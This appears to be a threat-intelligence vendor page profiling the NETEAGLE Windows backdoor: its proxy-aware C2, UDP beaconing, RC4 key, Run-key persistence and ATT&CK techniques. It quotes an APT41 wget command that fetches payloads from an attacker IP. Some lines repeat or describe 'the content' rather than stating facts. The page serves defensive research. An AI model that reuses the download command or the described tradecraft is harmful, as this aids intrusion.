NETEAGLE is a Windows backdoor associated with targeted intrusion activity and observed in Southeast Asia. It supports remote command-and-control over multiple network transports, including HTTP-based beaconing and a fallback non-application-layer channel when proxy settings are absent. The malware is proxy-aware: it checks whether the infected host is configured to use a proxy and, if so, communicates by HTTP POST; otherwise it uses UDP beaconing and can subsequently establish a plaintext TCP command-and-control channel. NETEAGLE can also retrieve additional command-and-control connection information over HTTP and decrypt downloaded resources with RC4.
Functionally, NETEAGLE provides operators with host discovery and remote access capabilities. Reported behaviors include process discovery, file and directory discovery, reading files from the compromised host over the command-and-control channel, sending process listings to operators, and executing shell commands through the Windows command shell. It also supports exfiltration over its existing command-and-control channel.
A documented SCOUT variant establishes persistence on Windows through Registry Run key autostart. NETEAGLE’s tradecraft includes dynamic resolution, symmetric cryptography for downloaded resources, and fallback communications mechanisms that improve resilience in restricted network environments. The malware has been cataloged as ATT&CK software S0034 and is best characterized as a Windows backdoor used in targeted espionage-oriented operations.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
13 distinct techniques documented for this family, organized by ATT&CK tactic.
The content repeatedly describes malware and threat actors establishing persistence by adding values under Registry Run keys such as HKCU\Software\Microsoft\Windows\CurrentVersion\Run and HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and by placing shortcuts or files in Startup folders.
The content repeatedly describes malware and threat actors establishing persistence by adding values under Registry Run keys such as HKCU\Software\Microsoft\Windows\CurrentVersion\Run and HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and by placing shortcuts or files in Startup folders.
APT41 used the Steam community page as a fallback mechanism for C2. Bazar has the ability to use an alternative C2 server if the primary server fails. BISCUIT malware contains a secondary fallback command and control server that is contacted after the primary command and control server.
The content is a long ATT&CK-style listing showing numerous malware families and threat groups that 'use HTTP,' 'use HTTPS,' 'HTTP POST requests,' 'HTTP GET requests,' or 'HTTP/S' for command and control communications. | Specific implementations mentioned include 'HTTP POST requests,' 'HTTP GET requests,' 'custom HTTP cookies,' 'Cookie HTTP header,' 'HTTP Upgrade request' for WebSocket initiation, and use of APIs such as 'Microsoft Graph API' or 'Dropbox HTTP API' for C2.
RainyDay has the ability to switch between TCP and HTTP for C2 if one method is not working. Mis-Type first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2. NETEAGLE will send beacons via UDP/6000 if no proxy is configured.
"APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits." ... "During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads." ... "CSPY Downloader can use GET requests to download additional payloads from C2."
The content is a catalog of malware and threat groups that encrypt command-and-control communications using algorithms such as DES, AES, RC4, XOR, Blowfish, RSA, Camellia, RC2, RC6, and custom ciphers.
"3PARA RAT command and control commands are encrypted within the HTTP C2 channel using the DES algorithm in CBC mode..."; "APT33 has used AES for encryption of command and control traffic."; "Carbanak encrypts the message body of HTTP traffic with RC2 (in CBC mode)."; "Duqu ... data stream can be encrypted with AES-CBC."; "PoisonIvy uses the Camellia cipher to encrypt communications."
21 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware capable of transferring or accessing files over its C2 channel.
Malware whose SCOUT variant persists by adding itself to the HKLM Run registry key.
Malware that adapts its beaconing protocol based on host proxy configuration.
Backdoor that uses RC4 with the key 'ScoutEagle' to decrypt downloaded resources.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.